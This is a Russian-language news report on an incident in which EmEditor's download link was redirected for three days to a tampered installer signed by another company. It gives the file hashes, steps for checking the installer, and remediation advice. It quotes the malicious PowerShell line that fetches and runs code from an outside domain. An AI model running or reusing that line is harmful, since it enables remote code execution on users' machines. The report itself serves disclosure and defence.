Компания Emurasoft, разработчик популярного текстового редактора EmEditor, подтвердила серьезный инцидент информационной безопасности. По данным официального уведомления, опубликованного 22 декабря 2025 года, злоумышленники смогли изменить ссылку для скачивания установщика на главной странице сайта проекта. В результате в течение почти трех дней пользователи, нажимавшие кнопку «Download Now», могли получить поддельный файл, содержащий потенциально вредоносный код.
По предварительным данным инцидента, атака была направлена на механизм перенаправления (redirect) на официальном сайте. В нормальных условиях кнопка загрузки ведет на корректный URL. Однако в период с 19 по 22 декабря 2025 года настройки перенаправления были изменены третьей стороной. Вследствие этого пользователей направляли на скачивание файла с другого адреса, который не контролировался Emurasoft. Этот файл, уже удаленный с серверов, имел цифровую подпись от имени организации WALSHAM INVESTMENTS LIMITED, а не от Emurasoft, Inc.
Единственным подтвержденно затронутым файлом является установщик "emed64_25.4.3.msi". Легитимный файл от Emurasoft имеет размер 80 376 832 байт и специфический хэш SHA-256. Скомпрометированная версия, подписанная WALSHAM INVESTMENTS LIMITED, отличалась размером (80 380 416 байт) и, очевидно, содержимым. Компания подчеркивает, что проблема могла затронуть не только англоязычную версию сайта, но и его локализации, включая японскую.
Легитимный SHA-256: e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e
Важно отметить, что инцидент не затрагивает пользователей, которые обновили программу через встроенный «Update Checker» или функцию автоматического обновления внутри самого EmEditor. Также не подвержены риску те, кто скачивал установщик напрямую с домена "download.emeditor.info", использовал портативную (portable) или магазинную (store app) версии, а также инструмент "winget". Не представляет опасности и просто скачанный, но не запущенный файл.
Emurasoft предоставила четкие инструкции по проверке. Пользователям, которые загружали установщик в указанный период через кнопку на главной странице, необходимо проверить цифровую подпись файла "emed64_25.4.3.msi". Для этого в Windows нужно открыть «Свойства» файла, перейти на вкладку «Цифровые подписи» и убедиться, что издателем указана «Emurasoft, Inc.». Наличие подписи «WALSHAM INVESTMENTS LIMITED» свидетельствует о потенциально опасном файле. Дополнительно можно сверить хэш SHA-256 через PowerShell командой "Get-FileHash".
| 1 | Get-FileHash .\emed64_25.4.3.msi -Algorithm SHA256 |
В случае обнаружения несоответствия подписи или хэша компания рекомендует немедленно принять серьезные меры. Прежде всего, необходимо отключить компьютер от сети и провести полную проверку системы на наличие вредоносного ПО (malware). В зависимости от ситуации может потребоваться переустановка операционной системы. Также крайне важно рассмотреть возможность компрометации учетных данных и сменить все пароли, которые использовались или хранились на этом устройстве, везде, где это возможно, активировав многофакторную аутентификацию (MFA). Корпоративным пользователям следует обратиться в свои внутренние команды безопасности, например, в CSIRT (Команда реагирования на компьютерные инциденты).
Согласно текущим наблюдениям, подозрительный установщик при запуске пытался выполнить команду "powershell.exe "irm emeditorjp.com | iex"". Эта команда предназначена для загрузки и выполнения кода с домена "emeditorjp.com", который не принадлежит и не контролируется Emurasoft. При этом установщик мог продолжить обычную установку легитимных файлов EmEditor, маскируя вредоносную активность и усложняя обнаружение угрозы.
В настоящее время Emurasoft продолжает расследование для определения полного масштаба инцидента. Компания пообещала публиковать обновления на официальном сайте и через другие каналы связи. В уведомлении выражаются глубокие сожаления по поводу произошедшего и даются заверения о принятии всех необходимых мер для выявления причин и предотвращения подобных случаев в будущем. Этот инцидент служит серьезным напоминанием для всех поставщиков программного обеспечения о критической важности защиты цепочки поставок и инфраструктуры веб-сайтов.
